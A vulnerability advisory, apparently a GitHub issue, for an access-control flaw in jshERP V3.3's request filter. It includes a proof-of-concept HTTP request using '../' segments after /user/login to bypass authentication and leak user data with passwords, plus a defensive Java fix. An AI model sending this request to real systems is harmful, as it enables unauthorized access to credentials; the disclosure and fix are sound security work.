CVE-2023-48894: There is an Incorrect Access Control vulnerability in jshERP V3.3 that lead to the leakage of sensitive information in the backend system · Issue #98 · jishenghua/jshERP
Incorrect Access Control vulnerability in jshERP V3.3 allows attackers to obtain sensitive information via the doFilter function.
1. The affected source code file is src/main/java/com/jsh/erp/filter/LogCostFilter.java, and the affected function is doFilter.
In the filter code, servletRequest.getRequestURI() is used to obtain the request path, which is then checked for whether it contains /doc.html, /user/login or /user/register. If so, chain.doFilter(request, response) is executed to skip this filter; otherwise the check continues.
It then checks whether the path starts with one of the allowUrls entries. If so, chain.doFilter(request, response) is executed to skip this filter.
See the screenshot below for the value of allowUrls
2. The problem lies in using servletRequest.getRequestURI() to obtain the request path. This method does not resolve special path segments such as ../ but returns the raw request URI, so dot segments can be used to bypass the check. Taking one of the backend interfaces, /jshERP-boot/user/getAllList, as an example: requesting /user/login/../../jshERP-boot/user/getAllList satisfies requestUrl.contains("/user/login"), and at the same time the request still reaches the getAllList interface, achieving a login bypass.
3. The PoC is as follows:
GET /user/login/../../jshERP-boot/user/getAllList HTTP/1.1
Host: 192.168.124.1:9999
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
When accessing the /jshERP-boot/user/getAllList interface directly, it returns "loginOut".
When accessing /user/login/../../jshERP-boot/user/getAllList, the access control is bypassed and the user information is returned, which also includes user passwords.
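As an added example (not jshERP's own code), the substring check described above is shown next to a hardened variant that resolves dot segments before comparing against an exact list of public paths. The PUBLIC_PATHS list is an assumption for the demo; the real allowUrls values are not shown here.

```java
import java.net.URI;
import java.net.URISyntaxException;
import java.util.List;

public class PathAllowlistCheck {
    // Assumed public paths, mirroring the three literals the filter matches with contains().
    private static final List<String> PUBLIC_PATHS =
            List.of("/doc.html", "/user/login", "/user/register");

    // Check in the style of LogCostFilter.doFilter: a substring match on the raw request URI.
    // Any URI that merely contains a public path, including one followed by ../, is treated as public.
    static boolean isPublicVulnerable(String rawUri) {
        for (String p : PUBLIC_PATHS) {
            if (rawUri.contains(p)) {
                return true;
            }
        }
        return false;
    }

    // Hardened check: normalize dot segments, decode the path, refuse anything that still
    // carries "..", then compare the whole normalized path exactly rather than by substring.
    static boolean isPublicHardened(String rawUri) {
        String normalized;
        try {
            // normalize() collapses "." and ".." segments; getPath() returns the percent-decoded path,
            // so an encoded "%2e%2e" surfaces as ".." and is caught by the check below.
            normalized = new URI(rawUri).normalize().getPath();
        } catch (URISyntaxException e) {
            return false; // unparseable URI: treat as protected, let the auth check run
        }
        if (normalized == null || normalized.contains("..")) {
            return false;
        }
        for (String p : PUBLIC_PATHS) {
            if (normalized.equals(p)) {
                return true;
            }
        }
        return false;
    }

    public static void main(String[] args) {
        String bypass = "/user/login/../../jshERP-boot/user/getAllList";
        System.out.println(isPublicVulnerable(bypass));      // true: filter would be skipped
        System.out.println(isPublicHardened(bypass));        // false: normalizes to /jshERP-boot/user/getAllList
        System.out.println(isPublicHardened("/user/login")); // true: genuine login path still public
    }
}
```

The same idea applies to the startsWith(allowUrls) branch: compare the normalized path, not the raw URI, so a public prefix cannot be prepended to a protected endpoint.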